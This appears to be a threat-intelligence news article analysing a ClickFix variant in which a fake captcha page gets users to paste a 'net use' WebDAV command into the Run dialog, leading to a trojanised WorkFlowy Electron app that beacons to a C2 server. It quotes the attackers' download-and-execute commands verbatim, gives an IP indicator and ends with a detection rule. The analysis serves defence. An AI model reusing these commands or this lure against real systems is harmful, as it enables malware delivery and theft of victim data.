New ClickFix Variant Exploits Win + R Shortcut to Bypass Security Measures

Recent findings by Atos Researchers have unveiled a new variant of the ClickFix technique, which exploits the Win + R shortcut to execute malicious commands on user devices. This method involves a “net use” command that maps a network drive from an external server, subsequently executing a batch file that downloads and unpacks a ZIP archive. The archive contains a legitimate application, WorkFlowy, but with malicious modifications concealed within an “.asar” archive, functioning as both a command-and-control (C2) beacon and a dropper for the final malware payload.

Attack Overview

The attack vector begins with a phishing webpage masquerading as a captcha mechanism, specifically “happyglamper[.]ro.” Users are prompted to open the Run application using “Win + R,” followed by “Ctrl + V” and “Enter.” This action triggers the execution of the following command:

plaintext
“cmd.exe” /c net use Z: https://94.156.170[.]255/webdav /persistent:no && “Z:update.cmd” & net use Z: /delete

In this instance, the attackers use the “net use” command to connect to an external server, a tactic not previously observed in ClickFix attacks. This approach allows adversaries to evade detection by traditional security measures.

Execution Flow and Detection

The execution flow of this ClickFix variant successfully bypassed Microsoft Defender for Endpoint detection. Atos security teams identified the threat through their internal Threat Hunting service, which focuses on behavioral aspects of the ClickFix technique, particularly the initial execution via the RunMRU registry key.

The script “update.cmd” is loaded from the mapped drive and executed, after which the drive mapping is removed. The content of “update.cmd” is as follows:

plaintext
start “” /min powershell -WindowStyle Hidden -Command “Invoke-WebRequest ‘https://94.156.170[.]255/flowy.zip‘ -OutFile “$env:TEMPdl.zip”;
Expand-Archive “$env:TEMPdl.zip” -DestinationPath “$env:LOCALAPPDATAMyApp” -Force;
Start-Process “$env:LOCALAPPDATAMyAppWorkFlowy.exe””

This command spawns a PowerShell instance that downloads a ZIP archive and extracts it into the “%LOCALAPPDATA%MyApp” directory, ultimately executing the “WorkFlowy.exe” binary.

Analysis of WorkFlowy

The ZIP archive contains a version of the WorkFlowy desktop application (1.4.1050), signed by “FunRoutine Inc.” This application is distributed as an Electron bundle, which utilizes web technologies such as HTML, CSS, and JavaScript. The malicious code is embedded in the main.js file within the app.asar archive.

Technical Profile

Infection Vector

The malicious ASAR archive directly replaces the legitimate resources/app.asar file. The attacker has repackaged an older version of the app (v1.4) with injected code, allowing for stealthy execution.

Malicious Code Functionality

Upon execution, WorkFlowy searches for the app.asar file in a hardcoded relative path. It reads the main.js file, decodes it, and executes it using the embedded V8 Google JavaScript engine. The attackers have replaced the legitimate main.js with a heavily obfuscated version that ensures malicious code is executed first, blocking the legitimate functionality of WorkFlowy.

Key Functions of the Malicious Code

1. Preemptive Execution: The injected code initiates an infinite C2 beacon loop, preventing the legitimate application from starting.
2. Persistent Fingerprinting: A random 8-character ID is generated and stored in %APPDATA%id.txt, allowing the attacker to track the victim across sessions.
3. C2 Beaconing: The code sends an HTTP POST request every two seconds, exfiltrating the victim’s unique ID, machine name, and Windows username to the C2 server.
4. Remote Payload Execution: The malicious function receives tasks from the C2, decodes base64-encoded content, writes it to a timestamped directory, and executes any .exe files.

If the C2 connection fails, no files or directories are created. At the time of this analysis, the C2 domain was unresponsive.

Effectiveness of Electron as a Delivery Mechanism

The malicious code operates in the Node.js main process, outside the Chromium sandbox, granting it full privileges of the logged-in user. This allows the malicious code to perform any actions permitted by the user. The payload, packed within the “.asar” archive, remains concealed, making detection challenging.

Persistence Mechanism

No OS-level persistence is established through the dropper. The beacon operates only while WorkFlowy is active. The only artifact written to disk is the %APPDATA%id.txt file, which is created only if the C2 connection is successfully established.

Conclusion

This ClickFix variant marks a significant evolution in attack strategies, moving away from commonly exploited scripting engines like PowerShell and MSHTA to utilize native networking utilities. By leveraging the “net use” command to mount a remote WebDAV share, attackers can execute hosted batch files with minimal visibility. The malicious logic, embedded within a legitimate application, complicates detection efforts, emphasizing the need for proactive threat hunting strategies.

For further insights and updates on cybersecurity threats, refer to the original reporting source at thehackernews.com.

Indicators of Compromise (IOCs)

Hunting Query

• Title: Suspicious Commands executed via Run dialog
• ID: 20891a30-032e-4f15-a282-fa4a8b0d8aae
• Status: Experimental
• Description: Detects suspicious command interpreters and LOLBins written into the Explorer RunMRU registry key.
• Author: TRC
• Date: 2026-03-05
• Tags: attack.execution, attack.t1059, attack.defense_evasion
• Log Source: Windows registry_set
• Detection:
  • Selection Key: TargetObject|contains: ‘SOFTWAREMicrosoftWindowsCurrentVersionExplorerRunMRU’
  • Selection Proc: Image|endswith: ‘explorer.exe’
  • Selection Data: Details|contains: ‘cmd ‘, ‘powershell ‘, ‘net.exe ‘, etc.
• False Positives: Legitimate administrative activity using the Run dialog.